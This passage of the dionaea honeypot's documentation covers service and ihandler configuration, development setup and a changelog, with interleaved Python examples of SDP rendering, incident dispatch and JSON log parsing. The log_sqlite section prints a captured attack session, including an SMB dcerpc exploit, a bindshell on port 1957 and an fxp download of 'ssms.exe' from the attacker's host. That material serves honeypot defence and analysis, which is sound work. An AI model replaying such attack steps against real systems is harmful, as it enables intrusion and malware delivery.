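_BLOCK_RE = re.compile(r"\[(\w+)\]\n?(.*?)\[/\1\]\n?", re.DOTALL)


def render_sdp(template, values):
    """Expand the control blocks, then substitute the {name} placeholders.

    values maps placeholder names to their value; None (or a missing key)
    means "not set", which removes the matching [name]...[/name] block.
    """
    def expand(match):
        name, body = match.group(1), match.group(2)
        return body if values.get(name) is not None else ""

    expanded = _BLOCK_RE.sub(expand, template)
    present = {k: v for k, v in values.items() if v is not None}
    try:
        return expanded.format(**present)
    except KeyError as exc:
        # A placeholder outside any control block refers to an unset value:
        # refuse rather than answer with a broken session description.
        raise ValueError(f"SDP references unset value {exc}") from exc


def media_lines(sdp):
    """Return the m= lines of a rendered SDP (one per offered media stream)."""
    return [line for line in sdp.splitlines() if line.startswith("m=")]


if __name__ == "__main__":
    # Constructed example values: audio only, no video port set.
    print(render_sdp(SDP_TEMPLATE, {"addrtype": "IP4", "unicast_address": "10.0.0.5",
                                    "audio_port": 8000, "video_port": None}))
```

With video_port left unset only the audio m= line is emitted and the [video_port] block disappears entirely; with both ports set, two media lines come out, and the session-level c= line is repeated inside the video block exactly as the template dictates.
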
1066 Example config
1067 services/sip.yaml
1068
1069 - name: sip
1070 config:
1071 udp_ports:
1072 - 5060
1073 tcp_ports:
1074 - 5060
1075 tls_ports:
1076 - 5061
1077 users: "@LOCALESTATEDIR@/lib/dionaea/sipaccounts.sqlite"
1078 rtp:
1079 enable: true
1080 # how to dump the rtp stream
1081 # bistream = dump as bistream
1082 modes:
1083 - bistream
1084 - pcap
1085 pcap:
1086 path: "var/dionaea/rtp/{personality}/%Y-%m-%d/"
1087 filename: "%H:%M:%S_{remote_host}_{remote_port}_in.pcap"
1088 personalities:
1089 default:
1090 domain: "localhost"
1091 name: "softphone"
1092 personality: "generic"
1093 # next-server:
1094 # domain: "my-domain"
1095 # name: "my server"
1096 # personality: "generic"
1097 # serve: ["10.0.0.1"]
1098 # default_sdp: "default"
1099 # handle: ["REGISTER", "INVITE", "BYE", "CANCEL", "ACK"]
1100
1101 actions:
1102 bank-redirect:
1103 do: "redirect"
1104 params:
1105 play-hello:
1106 do: "play"
1107 params:
1108 file: "var/dionaea/.../file.ext"
1109
1110
1111 SMB
1112 The main protocol offered by dionaea is SMB. SMB has a decent history
1113 of remotely exploitable bugs, and is a very popular target for worms.
1114 dionaea's SMB implementation makes use of a python3-adapted version of
1115 scapy. As scapy's own version of SMB was pretty limited, almost
1116 everything but the Field declarations had to be rewritten. The SMB
1117 emulation written for dionaea is used by the mwcollectd
1118 <http://code.mwcollect.org> low interaction honeypot too. Besides the
1119 known attacks on SMB, dionaea supports uploading files to smb shares.
1120 Adding new DCE remote procedure calls is a good start to get into the
1121 dionaea code; you can use:
1122
1123 SELECT
1124 COUNT(*),
1125 dcerpcrequests.dcerpcrequest_uuid,
1126 dcerpcservice_name,
1127 dcerpcrequest_opnum
1128 FROM
1129 dcerpcrequests
1130 JOIN dcerpcservices ON(dcerpcrequests.dcerpcrequest_uuid == dcerpcservices.dcerpcservice_uuid)
1131 LEFT OUTER JOIN dcerpcserviceops ON(dcerpcserviceops.dcerpcserviceop_opnum = dcerpcrequest_opnum AND dcerpcservices.dcerpcservice = dcerpcserviceops.dcerpcservice )
1132 WHERE
1133 dcerpcserviceop_name IS NULL
1134 GROUP BY
1135 dcerpcrequests.dcerpcrequest_uuid,dcerpcservice_name,dcerpcrequest_opnum
1136 ORDER BY
1137 COUNT(*) DESC;
1138
1139 to identify potentially useful targets among unknown dcerpc calls using
1140 the data you gathered and stored in your logsql database. Patches are
1141 appreciated.
1142
1143 Example config
1144 services/smb.yaml
1145
1146 - name: smb
1147 config:
1148
1149 ## Generic setting ##
1150
1151 # 1:"Windows XP Service Pack 0/1",
1152 # 2:"Windows XP Service Pack 2",
1153 # 3:"Windows XP Service Pack 3",
1154 # 4:"Windows 7 Service Pack 1",
1155 # 5:"Linux Samba 4.3.11"
1156 # os_type: 2
1157
1158 # Additional config
1159 # primary_domain: Test
1160 # oem_domain_name: Test
1161 # server_name: TEST-SERVER
1162
1163 ## Windows 7 ##
1164 # native_os: Windows 7 Professional 7600
1165 # native_lan_manager: Windows 7 Professional 6.1
1166 # shares:
1167 # ADMIN$:
1168 # comment: Remote Admin
1169 # path: C:\\Windows
1170 # type: disktree
1171 # C$:
1172 # coment: Default Share
1173 # path: C:\\
1174 # type:
1175 # - disktree
1176 # - special
1177 # IPC$:
1178 # comment: Remote IPC
1179 # type: ipc
1180 # Printer:
1181 # comment: Microsoft XPS Document Writer
1182 # type: printq
1183
1184 ## Samba ##
1185 # native_os: Windows 6.1
1186 # native_lan_manager: Samba 4.3.11
1187 # shares:
1188 # admin:
1189 # comment: Remote Admin
1190 # path: \\home\\admin
1191 # type: disktree
1192 # share:
1193 # coment: Default Share
1194 # path: \\share
1195 # type: disktree
1196 # IPC$:
1197 # comment: Remote IPC
1198 # path: IPC Service
1199 # type: ipc
1200 # Printer:
1201 # comment: Printer Drivers
1202 # type: printq
1203
1204
1205 TFTP
1206 Written to test the udp connection code, dionaea provides a tftp server
1207 on port 69, which can serve files. Even though there were vulnerabili‐
1208 ties in tftp services, I’m yet to see an automated attack on tftp ser‐
1209 vices.
1210
1211 Example config
1212 services/tftp.yaml
1213
1214 - name: tftp
1215 config:
1216 root: /var/lib/dionaea/roots/tftp
1217
1218
1219 UPnP
1220 Example config
1221 services/upnp.yaml
1222
1223 - name: upnp
1224 config:
1225 root: /var/lib/dionaea/roots/upnp
1226 # maximum size in kbytes of the request (32MB)
1227 max_request_size: 32768
1228 personality:
1229 # default
1230 cache: "CACHE-CONTROL: max-age=120\r\n"
1231 st: "ST: upnp:rootdevice\r\n"
1232 usn: "USN: uuid:Upnp-IPMI-1_0-1234567890001::upnp:rootdevice\r\n"
1233 server: "SERVER: Linux/2.6.17.WB_WPCM450.1.3 UPnP/1.0, Intel SDK for UPnP devices/1.3.1\r\n"
1234 location: "LOCATION: http://192.168.0.1:49152/IPMIdevicedesc.xml\r\n"
1235 opt: "OPT: http://schemas.upnp.org/upnp/1/0/\r\n"
1236 # # Samsung TV
1237 # cache: "CACHE-CONTROL: max-age=900\r\n"
1238 # st: "ST: uuid:c1fd12b2-d954-4dba-9e92-a697e1558fb4\r\n"
1239 # usn: "USN: uuid:c1fd12b2-d954-4dba-9e92-a697e1558fb4\r\n"
1240 # server: "SERVER: SHP, UPnP/1.0, Samsung UPnP SDK/1.0\r\n"
1241 # location: "LOCATION: http://192.168.0.10:7677/MainTVServer2\r\n"
1242 # opt: "OPT: http://schemas.upnp.org/upnp/1/0/\r\n"
1243 #
1244 # # XBOX 360
1245 # cache: "CACHE-CONTROL: max-age=1800\r\n"
1246 # st: "ST: urn:microsoft.com:service:X_MS_MediaReceiverRegistrar:1\r\n"
1247 # usn: "USN: uuid:531c567a-8c46-4201-bcd4-09afa554d859::urn:microsoft.com:service:X_MS_MediaReceiverRegistrar:1\r\n"
1248 # server: "SERVER: Microsoft-Windows/6.3 UPnP/1.0 UPnP-Device-Host/1.0\r\n"
1249 # location: "LOCATION: http://192.168.0.10:1055/upnphost/udhisapi.dll?content=uuid:531c567a-8c46-4201-bcd4-09afa554d859\r\n"
1250 # opt: "OPT: http://schemas.upnp.org/upnp/1/0/\r\n"
1251
1252
1254 Getting a copy of the malware is cool, getting an overview of the at‐
1255 tacks run on your sensor is priceless.
1256
1257 dionaea can write information to a text file, but be aware, dionaea's
1258 logging to text files is rather chatty, really chatty, and you do not
1259 want to look at the information, if you are not debugging the software
1260 or writing some new feature for it.
1261
1262 Of course, you can apply filters to the logging, to limit it to
1263 different facilities or levels, but in general you do not want to work
1264 with text files.
1265
1266 dionaea uses an internal communication system called incidents. An
1267 incident has an origin, which is a string, a path, and properties,
1268 which can be integers, strings, or a pointer to a connection. Incidents
1269 are kept minimal: they pass only the information required to incident
1270 handlers (ihandler). An ihandler can register a path for incidents it
1271 wants to get informed about; the paths are matched in a glob-like
1272 fashion. Therefore logging information using an ihandler is superior
1273 to text logging: you get the information you are looking for, and can
1274 write it to a format you choose yourself.
1275
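How the incident and ihandler mechanism fits together, as an added illustration that is not dionaea's own incident code: an incident carries an origin path and properties, a handler registers a glob pattern, and each incident is delivered to every handler whose pattern matches the origin. The Incident, IncidentBus and AcceptCounter classes, the matching via Python's fnmatch, and the sample incidents are assumptions made for this example; the origin names are taken from the Incident list in the development section of this page.

```python
import fnmatch
from collections import defaultdict


class Incident:
    """Illustrative stand-in for a dionaea incident: an origin path plus
    properties (this is not dionaea's own incident class)."""

    def __init__(self, origin, **properties):
        self.origin = origin
        self.properties = properties


class IncidentBus:
    """Delivers each incident to every handler whose registered path pattern
    matches the incident's origin, glob-style."""

    def __init__(self):
        self._handlers = []  # (pattern, callable) in registration order

    def register(self, pattern, handler):
        self._handlers.append((pattern, handler))

    def report(self, incident):
        """Dispatch one incident; returns how many handlers received it."""
        delivered = 0
        for pattern, handler in self._handlers:
            # fnmatchcase: '*' also matches '.', so "dionaea.connection.*"
            # covers "dionaea.connection.tcp.accept" as well.
            if fnmatch.fnmatchcase(incident.origin, pattern):
                handler(incident)
                delivered += 1
        return delivered


class AcceptCounter:
    """Example ihandler: counts accepted connections per remote address."""

    def __init__(self):
        self.per_remote = defaultdict(int)

    def __call__(self, incident):
        self.per_remote[incident.properties["remote_ip"]] += 1


def demo():
    bus = IncidentBus()
    counter = AcceptCounter()
    seen = []
    # Only accepts feed the counter; the second handler sees every connection incident.
    bus.register("dionaea.connection.*.accept", counter)
    bus.register("dionaea.connection.*", lambda inc: seen.append(inc.origin))

    # Constructed sample incidents: origins from the Incident list on this page,
    # addresses from the RFC 5737 documentation ranges.
    events = [
        Incident("dionaea.connection.tcp.listen", local_ip="192.0.2.10", local_port=445),
        Incident("dionaea.connection.tcp.accept", remote_ip="203.0.113.7", remote_port=51000,
                 local_ip="192.0.2.10", local_port=445),
        Incident("dionaea.connection.tls.accept", remote_ip="203.0.113.7", remote_port=51001,
                 local_ip="192.0.2.10", local_port=5061),
        Incident("dionaea.connection.free", remote_ip="203.0.113.7"),
        Incident("example.unrelated.incident"),  # hypothetical origin nobody registered for
    ]
    undelivered = sum(1 for event in events if bus.report(event) == 0)
    return {"accepts": dict(counter.per_remote), "seen": seen, "undelivered": undelivered}


if __name__ == "__main__":
    print(demo())
```

An incident whose origin matches no registered pattern is simply dropped, which is the point of the mechanism: a handler only ever receives the paths it asked for instead of the whole chatty text log.
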
1276 List of available ihandlers
1277
1278 emuprofile
1279 Example config
1280 ihandlers/emuprofile.yaml
1281
1282 - name: emuprofile
1283
1284
1285 fail2ban
1286 Example config
1287 ihandlers/fail2ban.yaml
1288
1289 - name: fail2ban
1290 config:
1291 downloads: "/var/lib/dionaea/downloads.f2b"
1292 offers: "/var/lib/dionaea/offers.f2b"
1293
1294
1295 ftp
1296 Example config
1297 ihandlers/ftp.yaml
1298
1299 # ftp client section
1300 - name: ftp
1301 config:
1302 # host for active ftp via NAT
1303 # * 0.0.0.0 - the initiating connection ip is used for active ftp
1304 # * not 0.0.0.0 - gets resolved as hostname and used
1305 active_host: "0.0.0.0"
1306
1307 # ports for active ftp; string indicating a range
1308 active_ports: 63001-64000
1309
1310
1311 hpfeeds
1312 Example config
1313 ihandlers/hpfeeds.yaml
1314
1315 - name: hpfeeds
1316 config:
1317 server: "hpfriends.honeycloud.net"
1318 port: 10000
1319 ident: ""
1320 secret: ""
1321 # dynip_resolve: enable to lookup the sensor ip through a webservice
1322 dynip_resolve: "http://hpfriends.honeycloud.net/ip"
1323
1324
1325 log_db_sql
1326 WARNING:
1327 This ihandler is experimental.
1328
1329 This incident handler can write interesting information about attacks
1330 and connections into an SQL database. It uses SQLAlchemy to support
1331 different databases.
1332
1333 Example config
1334 ihandlers/log_db_sql.yaml
1335
1336 - name: log_db_sql
1337 config:
1338 url: sqlite:////var/lib/dionaea/dionaea.db
1339
1340
1341 log_incident
1342 This ihandler can be used to export incidents in realtime to be pro‐
1343 cessed by external programs.
1344
1345 WARNING:
1346 This ihandler is in pre alpha state and it might be changed or re‐
1347 moved in the future.
1348
1349 Configure
1350 handlers
1351 List of URLs to submit the information to. At the moment only file,
1352 http and https are supported.
1353
1354 Format
1355 {
1356 "name": "<sensor-name>",
1357 "origin": "<name of the incident>",
1358 "timestamp": "<date in ISO 8601>",
1359 "data": {
1360 "connection": {
1361 "id": <internal ID>,
1362 "local_ip": "<local IP>",
1363 "local_port": <local port>,
1364 "remote_ip": "<remote IP>",
1365 "remote_hostname": "<remote hostname if resolvable>",
1366 "remote_port": <remote port>,
1367 "protocol": "<protocol>",
1368 "transport": "<transport tcp|udp>"
1369 }
1370 }
1371 }
1372
1373 Example config
1374 ihandlers/log_incident.yaml
1375
1376 - name: log_incident
1377 config:
1378 handlers:
1379 #- http://127.0.0.1:8080/
1380 - file:///var/lib/dionaea/dionaea_incident.json
1381
1382
1383 log_json
1384 This ihandler can submit information about attacks/connections encoded
1385 as json.
1386
1387 WARNING:
1388 This ihandler is in pre alpha state and it might be changed or re‐
1389 moved in the near future.
1390
1391 Configure
1392 flat_data
1393 Set to true to flatten object lists.
1394
1395 handlers
1396 List of URLs to submit the information to. At the moment only file,
1397 http and https are supported.
1398
1399 Format
1400 Format of the connection information:
1401
1402 {
1403 "connection": {
1404 "local": {
1405 "address": "<string:local ip address>",
1406 "port": <integer:local port>,
1407 },
1408 "protocol": "<string:service name e.g. httpd>",
1409 "remote": {
1410 "address": "<string:remote ip address>",
1411 "port": <integer:remote port>,
1412 "hostname": "<string:hostname of the remote host>"
1413 },
1414 "transport": "<string:transport protocol e.g. tcp or udp>",
1415 "type": "<string:connection type e.g. accepted, listen, ...>"
1416 }
1417 }
1418
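Both exported formats above, the log_incident envelope and the log_json connection record, are plain JSON, so consuming them from an external program is straightforward. The following Python is an added example, not part of dionaea, that checks a log_incident record for the documented envelope keys, summarises its connection in one line, and flattens a log_json connection record into dotted keys of the kind a flat_data consumer expects. The exact flattening dionaea applies is not specified on this page, so the flatten function, the sample records and the helper names are assumptions made for the example.

```python
import json

# Constructed sample line in the log_incident envelope documented above
# (sensor name, timestamp, ids and addresses are made up for this example).
SAMPLE_INCIDENT_LINE = json.dumps({
    "name": "sensor-01",
    "origin": "dionaea.connection.tcp.accept",
    "timestamp": "2018-05-01T12:00:00+00:00",
    "data": {
        "connection": {
            "id": 610,
            "local_ip": "192.0.2.10",
            "local_port": 445,
            "remote_ip": "203.0.113.7",
            "remote_hostname": "",
            "remote_port": 2010,
            "protocol": "smbd",
            "transport": "tcp",
        }
    },
})

# Constructed sample record in the log_json connection format documented above.
SAMPLE_LOG_JSON_LINE = json.dumps({
    "connection": {
        "local": {"address": "192.0.2.10", "port": 445},
        "protocol": "smbd",
        "remote": {"address": "203.0.113.7", "port": 2010, "hostname": ""},
        "transport": "tcp",
        "type": "accept",
    }
})

REQUIRED_ENVELOPE_KEYS = ("name", "origin", "timestamp", "data")


def parse_incident_line(line):
    """Parse one log_incident record and check the documented envelope keys."""
    record = json.loads(line)
    missing = [key for key in REQUIRED_ENVELOPE_KEYS if key not in record]
    if missing:
        raise ValueError(f"incident record is missing keys: {missing}")
    return record


def connection_summary(record):
    """One-line triage summary of the connection inside a log_incident record."""
    conn = record["data"]["connection"]
    return (f"{record['timestamp']} {record['origin']} {conn['protocol']}/{conn['transport']} "
            f"{conn['remote_ip']}:{conn['remote_port']} -> {conn['local_ip']}:{conn['local_port']}")


def flatten(obj, prefix=""):
    """Flatten nested dicts and lists into one level with dotted keys.

    List elements are keyed by position, so a record carrying several objects
    in a list still maps every value to a distinct key.
    """
    flat = {}
    if isinstance(obj, dict):
        for key, value in obj.items():
            flat.update(flatten(value, f"{prefix}{key}."))
    elif isinstance(obj, list):
        for index, value in enumerate(obj):
            flat.update(flatten(value, f"{prefix}{index}."))
    else:
        flat[prefix[:-1]] = obj
    return flat


def flatten_line(line):
    """Parse one JSON record (as written by log_json) and flatten it."""
    return flatten(json.loads(line))


if __name__ == "__main__":
    print(connection_summary(parse_incident_line(SAMPLE_INCIDENT_LINE)))
    print(flatten_line(SAMPLE_LOG_JSON_LINE))
```

The envelope check matters when the file handler is used: a consumer that tails dionaea_incident.json should reject a truncated or foreign line rather than index it with missing fields.
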
1419 Example config
1420 ihandlers/log_json.yaml
1421
1422 - name: log_json
1423 config:
1424 # Uncomment next line to flatten object lists to work with ELK
1425 # flat_data: true
1426 handlers:
1427 #- http://127.0.0.1:8080/
1428 - file:///var/lib/dionaea/dionaea.json
1429
1430
1431 log_sqlite
1432 WARNING:
1433 This ihandler was renamed in dionaea 0.4.0 from logsql to
1434 log_sqlite.
1435
1436 This is what the logsql python script does: it is an ihandler, and
1437 writes interesting incidents to a sqlite database. One of the benefits
1438 of this logging is the ability to cluster incidents based on the
1439 initial attack when retrieving the data from the database:
1440
1441 connection 610 smbd tcp accept 10.69.53.52:445 <- 10.65.34.231:2010
1442 dcerpc request: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' opnum 9
1443 p0f: genre:'Windows' detail:'XP SP1+, 2000 SP3' uptime:'-1' tos:'' dist:'11' nat:'0' fw:'0'
1444 profile: [{'return': '0x7c802367', 'args': ['', 'CreateProcessA'], 'call': 'GetProcAddress'},
1445 ...., {'return': '0', 'args': ['0'], 'call': 'ExitThread'}]
1446 service: bindshell://1957
1447 connection 611 remoteshell tcp listen 10.69.53.52:1957
1448 connection 612 remoteshell tcp accept 10.69.53.52:1957 <- 10.65.34.231:2135
1449 p0f: genre:'Windows' detail:'XP SP1+, 2000 SP3' uptime:'-1' tos:'' dist:'11' nat:'0' fw:'0'
1450 offer: fxp://1:1@10.65.34.231:8218/ssms.exe
1451 download: 1d419d615dbe5a238bbaa569b3829a23 fxp://1:1@10.65.34.231:8218/ssms.exe
1452 connection 613 ftpctrl tcp connect 10.69.53.52:37065 -> 10.65.34.231/None:8218
1453 connection 614 ftpdata tcp listen 10.69.53.52:62087
1454 connection 615 ftpdata tcp accept 10.69.53.52:62087 <- 10.65.34.231:2308
1455 p0f: genre:'Windows' detail:'XP SP1+, 2000 SP3' uptime:'-1' tos:'' dist:'11' nat:'0' fw:'0'
1456
1457 Additionally, you can query the database for many different things, re‐
1458 fer to:
1459
1460 • dionaea sql logging 2009/11/06
1461
1462 • post it yourself 2009/12/08
1463
1464 • sqlite performance 2009/12/12
1465
1466 • virustotal fun 2009/12/14
1467
1468 • Andrew Waite’s Blog for mimic-nepstats.py
1469
1470 for more examples of how to make use of the database.
1471
1472 Example config
1473 ihandlers/log_sqlite.yaml
1474
1475 - name: log_sqlite
1476 config:
1477 file: /var/lib/dionaea/dionaea.sqlite
1478
1479
1480
1481 nfq
1482 Example config
1483 ihandlers/nfq.yaml
1484
1485 - name: nfq
1486 # nfq can intercept incoming tcp connections during the tcp handshake
1487 # giving your honeypot the possibility to provide service on
1488 # ports which are not served by default.
1489 # refer to the documentation BEFORE using this
1490 config:
1491 # 0 = DROP
1492 nfaction: 0
1493 throttle:
1494 window : 30
1495 limits:
1496 total: 30
1497 slot: 30
1498 timeouts:
1499 server:
1500 listen: 5
1501 client:
1502 idle: 10
1503 sustain: 240
1504
1505
1506 p0f
1507 Example config
1508 ihandlers/p0f.yaml
1509
1510 - name: p0f
1511 config:
1512 # start p0f with
1513 # sudo p0f -i any -u root -Q /tmp/p0f.sock -q -l
1514 path: "un:///tmp/p0f.sock"
1515
1516
1517 store
1518 Example config
1519 ihandlers/store.yaml
1520
1521 - name: store
1522
1523
1524 submit_http
1525 Example config
1526 ihandlers/submit_http.yaml
1527
1528 - name: submit_http
1529 config:
1530 # the url to send the submission requests to
1531 url: "http://example.org/"
1532 # E-Mail (optional)
1533 # email: ""
1534 # username (optional)
1535 # user:
1536 # password (optional)
1537 # pass:
1538
1539
1540 submit_http_post
1541 Example config
1542 ihandlers/submit_http_post.yaml
1543
1544 - name: submit_http_post
1545 config:
1546 submit:
1547 file_upload:
1548 urls:
1549 - http://example.org/upload
1550 - http://example.com/file.php
1551 field_values:
1552 submit: "Upload file"
1553 file_fieldname: upload_file
1554
1555
1556 tftp_download
1557 Example config
1558 ihandlers/tftp_download.yaml
1559
1560 - name: tftp_download
1561
1562
1563 VirusTotal
1564 This ihandler submits the captured malware samples to the VirusTotal
1565 service for further analysis.
1566
1567 Configuration
1568 apikey
1569 The VirusTotal API-Key.
1570
1571 file
1572 SQLite database file used to cache the results.
1573
1574 Example config
1575 ihandlers/virustotal.yaml
1576
1577 - name: virustotal
1578 config:
1579 # grab it from your virustotal account at My account -> Inbox -> Public API
1580 apikey: "........."
1581 file: "/var/lib/dionaea/vtcache.sqlite"
1582
1583
1585 Processors control the actions done on the bi-directional streams we
1586 gain when getting attacked; the default is running the emu processor
1587 on them to detect shellcode.
1588
1589 Emu
1590 Use libemu to find and emulate shellcodes.
1591
1592 Configuration
1593 Filter
1594 Only continue with the processing pipeline if all conditions match.
1595
1596 Configuration
1597 protocols
1598 Comma separated list of connection types.
1599
1600 types
1601 Comma separated list of connection types.
1602
1603 • accept - dionaea accepts a new connection from a remote host
1604
1605 • connect - dionaea makes a connection to a remote host
1606
1607 Streamdumper
1608 This processor can dump a connection as bi-directional stream. The
1609 dump can be used to replay an attack on ip-level without messing with
1610 pcap and tcpreplay.
1611
1612 Configuration
1613 path
1614 Dumps will be created in this directory.
1615
1617 First of all, thank you for your interest in contributing to dionaea!
1618
1619 Filing bug reports
1620 Bug reports are very welcome. Please file them on the GitHub issue
1621 tracker. Good bug reports come with extensive descriptions of the er‐
1622 ror and how to reproduce it.
1623
1624 Patches
1625 All patches to dionaea should be submitted in the form of pull requests
1626 to the main dionaea repository, DinoTools/dionaea. These pull requests
1627 should satisfy the following properties:
1628
1629 Code
1630 • The pull request should focus on one particular improvement to
1631 dionaea.
1632
1633 • Create different pull requests for unrelated features or bugfixes.
1634
1635 • Python code should follow PEP 8, especially in the “do what code
1636 around you does” sense.
1637
1638 Documentation
1639 When introducing new functionality, please remember to write
1640 documentation.
1641
1642 Review
1643 Finally, pull requests must be reviewed before merging. Everyone can
1644 perform reviews; this is a very valuable way to contribute, and is
1645 highly encouraged.
1646
1648 dionaea's initial development was funded by the Honeynet Project as
1649 part of the Honeynet's Summer of Code during 2009. The development
1650 process is as open as possible. You can browse the source online and
1651 report bugs on GitHub.
1652
1653 Development
1654 Vagrant
1655 Vagrant can be used to setup a development environment for dionaea
1656 within minutes.
1657
1658 Install
1659 First install Vagrant and VirtualBox.
1660
1661 If everything has been set up correctly, clone the git repository and
1662 use vagrant to bootstrap and start the environment.
1663
1664 $ git clone https://github.com/DinoTools/dionaea.git
1665 $ cd dionaea/vagrant
1666 $ vagrant up
1667
1668 All files will be installed in the /opt/dionaea directory.
1669
1670 Run
1671 Access the development environment, edit the config files and start
1672 dionaea with the following command.
1673
1674 $ sudo /opt/dionaea/bin/dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg -l all,-debug -L '*'
1675
1676 Rebuild and test
1677 To rebuild and install dionaea run the following commands.
1678
1679 $ cd /vagrant
1680 $ make
1681 $ sudo make install
1682
1683 See Run for more information on how to start dionaea.
1684
1685 Ubuntu 14.04
1686 Instead of using Vagrant you can use an Ubuntu 14.04 system to set up
1687 your development environment. In this section we will use the scripts
1688 used to set up the Vagrant environment to bootstrap a fresh Ubuntu
1689 system. If you like you can follow the ../installation ‘From Source’
1690 guide to set up everything by hand.
1691
1692 Install
1693 First install Ubuntu.
1694
1695 If everything has been set up correctly, clone the git repository,
1696 change into its vagrant directory and run the bootstrap script.
1697
1698 $ git clone https://github.com/DinoTools/dionaea.git
1699 $ cd dionaea/vagrant
1700 $ ./bootstrap.sh
1701
1702 All files will be installed in the /opt/dionaea directory.
1703
1704 Rebuild and test
1705 Rebuild, install and start dionaea from the root of the git repository.
1706
1707 $ make
1708 $ sudo make install
1709 $ sudo /opt/dionaea/bin/dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg -l all,-debug -L '*'
1710
1711 This can also be done in one line.
1712
1713 $ make && sudo make install && sudo dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg -l all,-debug -L '*'
1714
1715 Find memory leaks
1716 To enable AddressSanitizer you have to add the following parameters to
1717 the configure script and rebuild dionaea.
1718
1719 --disable-shared CFLAGS="-fsanitize=address -ggdb" CXXFLAGS="-fsanitize=address -ggdb"
1720
1721 When running dionaea it will print information about overflow errors.
1722 If you would like to stop execution on the first error you have to
1723 export an additional environment variable.
1724
1725 export ASAN_OPTIONS='abort_on_error=1'
1726
1727 To get a stacktrace you can use gdb and add an additional breakpoint
1728 break __asan_report_error.
1729
1730 It is also possible to use asan_symbolize.py python2 script to extract
1731 additional information.
1732
1733 /opt/dionaea/bin/dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg 2>&1 | python asan_symbolize.py
1734
1735 Logging
1736 Logging should be used to report errors and for debugging purposes. It
1737 must not be used to report attacks. Incidents should be used for this
1738 purpose. For more information have a look at the ihandler section.
1739
1740 Comparison glib2 and Python
1741
1742 ┌─────────┬──────────┐
1743 │glib2 │ Python │
1744 ├─────────┼──────────┤
1745 │debug │ debug │
1746 ├─────────┼──────────┤
1747 │info │ info │
1748 ├─────────┼──────────┤
1749 │warning │ warning │
1750 ├─────────┼──────────┤
1751 │critical │ error │
1752 ├─────────┼──────────┤
1753 │error │ critical │
1754 └─────────┴──────────┘
1755
1756 WARNING:
1757 In glib2 a critical message means critical warning. But in Python a
1758 critical message is handled as critical error.
1759
1760 WARNING:
1761 An error message in glib2 or a critical message in a Python module
1762 will terminate the program immediately.
1763
1764 Incident
1765 Some of the incidents reported by the dionaea core are listed below.
1766
1767 dionaea.connection.tcp.accept:
1768 A new TCP connection has been accepted by dionaea.
1769
1770 dionaea.connection.tls.accept:
1771 A new SSL/TLS connection has been accepted by dionaea.
1772
1773 dionaea.connection.tcp.connect:
1774 Reported after dionaea has connected to an external service via TCP.
1775
1776 dionaea.connection.tls.connect:
1777 Reported after dionaea has connected to an external service via
1778 SSL/TLS.
1779
1780 dionaea.connection.udp.connect:
1781 Reported after dionaea has connected to an external service via UDP.
1782
1783 dionaea.connection.free:
1784 A connection has been closed and freed.
1785
1786 dionaea.connection.tcp.listen:
1787 Fired after a TCP service has been bound and is listening for
1788 incoming connections.
1789
1790 dionaea.connection.tls.listen:
1791 Fired after an SSL/TLS service has been bound and is listening for
1792 incoming connections.
1793
1794 dionaea.connection.tcp.pending:
1795
1796 dionaea.connection.tcp.reject:
1797 An incoming connection has been rejected by the server.
1798
1799 dionaea.connection.link.early:
1800
1801 dionaea.connection.link:
1802 Reported to give the log management the chance to link two connec‐
1803 tions.
1804
1806 0.8.0 - (master)
1807 0.7.0 - (2018-05-01)
1808 build
1809
1810 • Add initial cmake support
1811
1812 ci
1813
1814 • Add Debian 9
1815
1816 dionaea
1817
1818 • Fix build error with OpenSSL 1.1.0
1819
1820 • Improve OpenSSL 1.1.0 support
1821
1822 • Cleanup connection code
1823
1824 • Enable bistream for SSL/TLS connections (Thanks Aws0mus)
1825
1826 • Fixing chroot bugs (Thanks Michal Ambroz)
1827
1828 doc
1829
1830 • Add additional information
1831
1832 • Doxygen config file for dionaea c core
1833
1834 • Ubuntu 16.04 install instructions
1835
1836 package
1837
1838 • Remove old and deprecated debian package config
1839
1840 python
1841
1842 • Fix typo in config key
1843
1844 • Fix hardcoded python path
1845
1846 • Fix compilation on CentOS7 (Thanks Michal Ambroz)
1847
1848 python/http
1849
1850 • Initial support to handle SOAP requests
1851
1852 python/log_incident
1853
1854 • Improve hash generator
1855
1856 • Fix bug if parent is unknown
1857
1858 • Remove IDs from list if processed
1859
1860 python/mongo
1861
1862 • Initial support to simulate a MongoDB server
1863
1864 python/pyev
1865
1866 • Update from 0.8 to 0.9 to support Python >= 3.6
1867
1868 python/smb
1869
1870 • Add support for WannaCry and SambaCry (Big thanks to gento)
1871
1872 • Add additional config options to change identity
1873
1874 python/util
1875
1876 • Find Download commands for Linux shell
1877
1878 0.6.0 - (2016-11-14)
1879 dionaea
1880
1881 • Fix build for musl lib
1882
1883 doc
1884
1885 • Fix install instructions
1886
1887 • Extend README.md
1888
1889 python/blackhole
1890
1891 • New service/Initial version
1892
1893 python/emu_scripts
1894
1895 • New handler to analyse downloaded scripts
1896
1897 • Detect VBScript and PowerShell
1898
1899 • Limit number of subdownloads
1900
1901 python/http
1902
1903 • Clean up
1904
1905 • Use state vars instead of strings
1906
1907 • Add template support * Jinja 2 template engine * nginx template
1908
1909 python/mysql
1910
1911 • Dump files from SELECT queries
1912
1913 • Extract URLs from functions
1914
1915 • Variable handler
1916
1917 • Support for selecting variables
1918
1919 python/p0f
1920
1921 • Fix decode error
1922
1923 python/pptp
1924
1925 • Fix error if config is empty
1926
1927 0.5.1 - 2016-09-05
1928 dionaea
1929
1930 • Don’t report ‘connection.free’ incident to early to prevent segmenta‐
1931 tion faults
1932
1933 0.5.0 - 2016-08-06
1934 dionaea
1935
1936 • Handle byte objects in incidents
1937
1938 • Bump required Python version from 3.2 to 3.4
1939
1940 python/http
1941
1942 • Detect Shellshock attacks
1943
1944 python/log_incident
1945
1946 • Initial support to export raw incident information
1947
1948 python/log_sqlite
1949
1950 • Log credentials from the ftp service
1951
1952 python/memcache
1953
1954 • Initial support for the memcached protocol
1955
1956 python/pptp
1957
1958 • Clean up
1959
1960 • Handle CallClearRequests packets
1961
1962 • Values for hostname, vendor name and firmware revision are now cus‐
1963 tomizable
1964
1965 python/util
1966
1967 • New function to detect shellshock attacks and report detected URLs
1968
1969 0.4.2 - 2016-07-02
1970 doc
1971
1972 • Add information about log levels for developers
1973
1974 python/*
1975
1976 • Replace all critical log messages with error messages
1977
1978 • Catch exceptions in handle_io_in() and handle_io_out() to improve
1979 stability
1980
